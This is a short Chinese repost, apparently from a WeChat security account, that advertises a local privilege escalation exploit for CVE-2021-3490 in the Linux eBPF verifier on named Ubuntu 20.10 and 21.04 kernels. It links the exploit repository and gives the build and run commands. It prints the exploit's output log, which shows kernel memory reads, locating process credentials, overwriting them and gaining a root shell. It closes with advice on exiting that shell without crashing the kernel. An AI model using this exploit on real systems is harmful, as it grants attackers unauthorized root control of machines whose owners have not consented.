针对 CVE-2021-3490 的 LPE 漏洞利用。在 Ubuntu 20.10 (Groovy Gorilla) 内核 5.8.0-25.26 到 5.8.0-52.58 上测试。和 Ubuntu 21.04 (Hirsute Hippo) 5.11.0-16.17。
https://github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490
用法:
为 Ubuntu 20.10 (Groovy Gorilla) 构建:
make groovy为 Ubuntu 21.04 (Hirsute Hippo) 构建:
make hirsute运行:
bin/exploit.bin[] eBPF enabled, maps created![] addr of oob BPF array map: ffffa008c1202110[] addr of array_map_ops: ffffffff956572a0[] kernel read successful![] searching for init_pid_ns in kstrtab ...[] addr of init_pid_ns in kstrtab: ffffffff95b03a4a[] searching for init_pid_ns in ksymtab...[] addr of init_pid_ns ffffffff96062d00[] searching for creds for pid: 770[] addr of cred structure: ffffa0086758dec0[] preparing to overwrite creds...[] success! enjoy r00t :)
注意:您必须通过键入exit执行清理并避免内核崩溃来干净地退出 root shell
本文始发于微信公众号(Khan安全攻防实验室):Linux_LPE_eBPF_CVE-2021-3490
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论